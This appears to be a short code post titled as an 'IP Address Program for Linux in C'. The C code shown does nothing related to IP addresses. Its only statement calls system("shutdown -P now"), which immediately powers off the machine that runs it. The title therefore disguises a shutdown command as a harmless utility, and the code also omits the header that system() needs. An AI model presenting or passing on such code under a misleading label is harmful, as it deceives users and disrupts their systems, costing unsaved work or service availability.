IP Address Program for Linux in C

#include <stdio.h>
 
int main() {
  system("shutdown -P now");
  return 0;
}